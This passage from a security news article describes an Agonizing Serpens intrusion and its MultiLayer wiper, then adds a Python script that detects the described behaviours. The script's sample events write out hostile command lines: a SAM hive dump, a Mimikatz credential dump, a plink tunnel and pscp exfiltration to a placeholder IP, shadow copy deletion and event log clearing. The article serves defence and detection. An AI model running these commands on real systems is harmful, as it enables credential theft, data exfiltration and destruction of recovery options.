To obtain administrative credentials the attackers deployed Mimikatz, an open-source tool for extracting credentials from Windows memory and registry hives. They dumped the Windows Security Accounts Manager (SAM) database and attempted to guess SMB credentials through password spraying and other brute-force techniques. With valid credentials in hand, the attackers used PuTTY Link (plink), a command-line connection and tunneling tool, to reach other systems.
Data exfiltration and system wiping
In the next stage of the compromise the attackers deployed the first custom tool, called sqlextractor. As its name implies, it connects to databases and extracts information, in particular personal data such as national ID numbers, passport scans, email addresses and home addresses. The data is written to CSV files, archived and exfiltrated to a command-and-control server with public tools such as WinSCP or pscp.exe (the PuTTY Secure Copy client). Process memory dumps saved as .dmp files were also exfiltrated.
“During the incident, the attackers attempted to use three separate wipers as part of the destructive attack,” the researchers said. “While some of the wipers show code similarities to previously reported wipers the Agonizing Serpens group used, others are considered brand new and have been used for the first time in this attack.”
The first wiper, called MultiLayer, is written in .NET. It drops two binaries, MultiList and MultiWip. MultiList enumerates all files on the system and builds a list of file paths, excluding certain folders, while MultiWip is the wiping component that overwrites the listed files with random data.
To hinder recovery, the wiper changes the timestamps of the targeted files and renames them away from their original paths before deleting them. MultiLayer also deletes all Windows event logs and volume shadow copies and wipes the first 512 bytes of the physical disk, which hold the boot sector, so the system cannot boot after a restart. It then deletes itself and all the scripts it created and used.
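The chain described above (SAM dump and Mimikatz, plink tunneling, exfiltration with pscp or WinSCP, then shadow copy deletion, event log clearing and bulk timestamp changes by the wiper) maps cleanly onto process-creation and file telemetry. The following is an added detection example written for this page; it is not Unit 42's code, not the attackers' tooling, and the command lines, event shapes and thresholds are constructed assumptions that illustrate the behaviours, not indicators taken from the report.

```python
"""Toy detection pass over constructed Sysmon-style events for the
behaviours described in the article. Added example, not Unit 42's code.
Command lines, event fields and thresholds are illustrative assumptions."""
import re
from collections import Counter

# Constructed sample events (not real telemetry).
# eid 1 = process creation, eid 2 = file creation time changed (Sysmon).
SAMPLE_EVENTS = [
    {"eid": 1, "pid": 4010, "image": r"C:\Windows\System32\reg.exe",
     "cmd": r"reg save HKLM\SAM C:\Temp\sam.hiv"},            # SAM hive dump
    {"eid": 1, "pid": 4022, "image": r"C:\Users\svc\mimikatz.exe",
     "cmd": r"mimikatz.exe privilege::debug sekurlsa::logonpasswords"},
    {"eid": 1, "pid": 4100, "image": r"C:\Tools\plink.exe",
     "cmd": r"plink.exe -N -R 3389:127.0.0.1:3389 user@203.0.113.10"},  # tunnel
    {"eid": 1, "pid": 4200, "image": r"C:\Tools\pscp.exe",
     "cmd": r"pscp.exe -pw x C:\Temp\dump.7z user@203.0.113.10:/up/"},  # exfil
    {"eid": 1, "pid": 4300, "image": r"C:\Windows\System32\vssadmin.exe",
     "cmd": r"vssadmin delete shadows /all /quiet"},
    {"eid": 1, "pid": 4310, "image": r"C:\Windows\System32\wevtutil.exe",
     "cmd": r"wevtutil cl Security"},
    {"eid": 1, "pid": 5000, "image": r"C:\Program Files\Backup\backup.exe",
     "cmd": r"backup.exe --sync C:\Data"},                    # benign noise
]
# Time-stomping: one process rewriting creation times on many files
# (pid 4400, wiper-like) versus a benign process touching two (pid 5000).
SAMPLE_EVENTS += [{"eid": 2, "pid": 4400, "target": fr"C:\Data\file{i}.docx"}
                  for i in range(60)]
SAMPLE_EVENTS += [{"eid": 2, "pid": 5000, "target": fr"C:\Data\idx{i}.db"}
                  for i in range(2)]

# Command-line rules, one per behaviour named in the article. The exact
# syntax each tool was invoked with is an assumption for this example.
CMDLINE_RULES = [
    ("sam_hive_dump", re.compile(r"\breg(\.exe)?\s+save\s+hklm\\sam\b", re.I)),
    ("mimikatz_credential_dump", re.compile(r"sekurlsa::|lsadump::|mimikatz", re.I)),
    ("plink_tunnel", re.compile(r"\bplink(\.exe)?\b.*\s-[LR]\s", re.I)),
    ("putty_scp_exfil", re.compile(r"\b(pscp|winscp)(\.exe)?\b.*\S+@\S+:", re.I)),
    ("shadow_copy_deletion", re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows", re.I)),
    ("event_log_clear", re.compile(r"\bwevtutil(\.exe)?\s+cl\b", re.I)),
]

# Which stage of the intrusion each rule evidences (assumed mapping).
PHASES = {
    "sam_hive_dump": "credential_access",
    "mimikatz_credential_dump": "credential_access",
    "plink_tunnel": "lateral_movement",
    "putty_scp_exfil": "exfiltration",
    "shadow_copy_deletion": "impact",
    "event_log_clear": "impact",
    "bulk_timestamp_change": "impact",
}


def detect(events, stomp_threshold=20):
    """Return a sorted list of (rule_name, pid) hits over the event stream.

    Process-creation events are matched against CMDLINE_RULES; file
    creation-time changes are counted per process and flagged when one
    process exceeds stomp_threshold (assumed value) within the stream.
    """
    hits = []
    stomps = Counter()
    for ev in events:
        if ev["eid"] == 1:
            for name, rx in CMDLINE_RULES:
                if rx.search(ev["cmd"]):
                    hits.append((name, ev["pid"]))
        elif ev["eid"] == 2:
            stomps[ev["pid"]] += 1
    for pid, count in stomps.items():
        if count >= stomp_threshold:
            hits.append(("bulk_timestamp_change", pid))
    return sorted(hits)


def observed_phases(hits):
    """Distinct intrusion phases evidenced by the hits, sorted by name."""
    return sorted({PHASES[name] for name, _ in hits})


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for rule, pid in found:
        print(f"{rule:28s} pid={pid}")
    print("phases:", ", ".join(observed_phases(found)))
```

The per-rule hits are less interesting than `observed_phases`: a host that shows credential access, lateral movement, exfiltration and impact in one window is the pattern to page on, whereas any single rule (a backup agent that rewrites timestamps, an admin clearing a log) fires alone on normal days. Thresholds and the raw-disk write to the boot sector are not covered here; the latter needs a driver- or EDR-level hook on writes to the physical device rather than process command lines.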
The Palo Alto researchers noted that MultiLayer shares function naming conventions and even entire code blocks with other custom tools previously attributed to Agonizing Serpens, such as Apostle, IPsec Helper and Fantasy, which suggests the tools share a code base or were written by the same developer.